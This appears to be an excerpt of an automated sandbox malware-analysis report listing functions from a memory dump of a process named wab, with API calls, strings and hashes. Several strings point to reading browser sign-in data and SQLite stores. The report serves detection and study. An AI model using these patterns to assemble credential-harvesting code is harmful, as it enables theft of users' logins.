                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                                                    • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                                                    • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2047574939-0
                                                                                                                                                                                                                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                                                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                                                                                                                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                    • String ID: 6$\
                                                                                                                                                                                                                    • API String ID: 404372293-1284684873
                                                                                                                                                                                                                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                                                                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
